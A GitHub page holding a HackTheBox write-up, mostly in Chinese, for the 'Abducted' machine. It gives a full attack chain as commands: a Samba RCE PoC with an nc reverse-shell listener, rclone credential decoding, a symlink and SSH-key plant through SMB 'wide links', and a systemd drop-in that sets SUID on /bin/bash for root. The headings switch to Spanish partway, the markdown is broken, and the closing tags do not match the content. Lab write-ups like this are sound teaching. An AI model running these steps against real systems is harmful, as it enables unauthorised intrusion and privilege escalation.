Cosm3No1de/HTB-Abducted-Writeup
GitHub: Cosm3No1de/HTB-Abducted-Writeup
HackTheBox Linux 靶机 Abducted 的渗透测试 write-up,演示了从 Samba RCE 到 systemd 提权的完整攻击链。
Stars: 0 | Forks: 0

# 🛸 Abducted – HackTheBox Machine Write-up
**靶机:** Abducted
**难度:** 中等
**系统:** Linux
**技术:** SMB, CVE-2026-4480, 通过 systemd 提权, 滥用 wide links 和 force user, SUID
## 📖 描述
**Abducted** 是一台 HackTheBox 的 Linux 靶机,它利用了 Samba 打印子系统中一个严重的漏洞(**CVE-2026-4480**)来实现远程代码执行(RCE)。在获得 `nobody` 用户的初始 shell 后,通过枚举配置文件,发现了使用 `rclone` 混淆的凭据,从而允许通过 SSH 登录用户 `scott`。通过滥用 SMB 的不安全配置(`wide links` 和 `force user = marcus`),可以横向提权到用户 `marcus`,最后,利用在 systemd 目录中的写入权限,通过 `/bin/bash` 上的 SUID 获得 `root` 访问权限。
本 write-up 记录了完整的枚举、漏洞利用和权限提升过程,旨在为 pentester 和安全爱好者提供教育性质的指南。
## 📌 流程摘要
1. **侦察**
- 端口扫描:SSH (22) 和 SMB (139, 445)。
- 使用空认证枚举 SMB 共享资源。
- 识别出具有写入权限的 `HP-Reception` 打印机共享。
2. **漏洞利用 (CVE-2026-4480)**
- 使用公开的 PoC 通过打印作业描述执行命令。
- 获取作为 `nobody` 用户的反弹 shell。
3. **后渗透与凭据获取**
- 在标准路径之外搜索 `.conf` 文件。
- 发现 `/opt/offsite-backup/rclone.conf` 包含 `svc-backup` 的混淆凭据。
- 通过 `rclone reveal` 解码密码。
- 该密码适用于通过 SSH 登录的用户 `scott`。
4. **标准用户访问**
- 通过 SSH 登录 `scott`。
- 读取 user flag。
5. **提权至 Marcus(滥用 SMB)**
- 验证易受攻击的配置:`transfer` 共享中的 `wide links = yes` 和 `force user = marcus`。
- 创建一个从 `/srv/transfer/keys` 到 `/home/marcus` 的符号链接。
- 生成 SSH 密钥,并将公钥上传到 Marcus 的 `.ssh` 目录中。
- 使用私钥以 `marcus` 身份进行 SSH 登录。
6. **提权至 root(systemd + SUID)**
- 发现 `marcus` 属于 `operators` 组。
- `operators` 组对 `/etc/systemd/system/smbd.service.d` 具有写入权限。
- 创建一个 drop-in (`daffy.conf`),在 `smbd` 启动前执行 `chmod +s /bin/bash`。
- 重启 `smbd` 服务以激活 `/bin/bash` 上的 SUID 位。
- 执行 `/bin/bash -p` 以获取具有 `root` 权限的 shell。
- 读取 root flag。
## 🛠️ 使用的工具
- `nmap`
- `nxc` (NetExec) / `crackmapexec`
- `smbclient`
- `rclone`
- `ssh-keygen`
- `systemctl`
## 🚀 漏洞利用与关键命令
### 1. 枚举 SMB 共享
```
nxc smb abducted.htb -u '' -p '' --shares
2. Clonar y ejecutar el PoC de CVE-2026-4480
bash
git clone https://github.com/TheCyberGeek/CVE-2026-4480-PoC.git
cd CVE-2026-4480-PoC
nc -lvnp 8443
python3 exploit.py 10.129.244.177 8443 -P HP-Reception
3. Decodificar contraseña ofuscada de rclone
bash
rclone reveal
4. Acceso SSH como scott
bash
ssh scott@10.129.244.177
5. Subir clave pública a Marcus vía SMB
bash
ssh-keygen -q -t ed25519 -N '' -f /tmp/k
ln -s /home/marcus /srv/transfer/keys
smbclient //127.0.0.1/transfer -U 'scott%' -c 'mkdir keys/.ssh; put /tmp/k.pub keys/.ssh/authorized_keys'
ssh marcus@localhost -i /tmp/k
6. Escalada a root con systemd
bash
cat > /etc/systemd/system/smbd.service.d/daffy.conf << 'EOF'
[Service]
ExecStartPre=/bin/bash -c 'chmod +s /bin/bash'
EOF
systemctl daemon-reload
systemctl restart smbd
/bin/bash -p
cat /root/root.txt
🔒 Flags (redactadas)
User flag: [REDACTED]
Root flag: [REDACTED]
📚 Referencias
CVE-2026-4480 PoC
HackTheBox - Abducted
👨💻 Autor
cosmenoide dev
GitHub · Portfolio# HTB-Abducted-Writeup
HTB "Abducted" write-up. Exploit CVE-2026-4480 (Samba RCE) → SMB wide links → systemd → root. Full methodology and flags.
```
标签:Samba, StruQ, Web报告查看器, XXE攻击, 内存分配, 协议分析, 后端开发, 安全, 应用安全, 权限提升, 超时处理, 逆向工具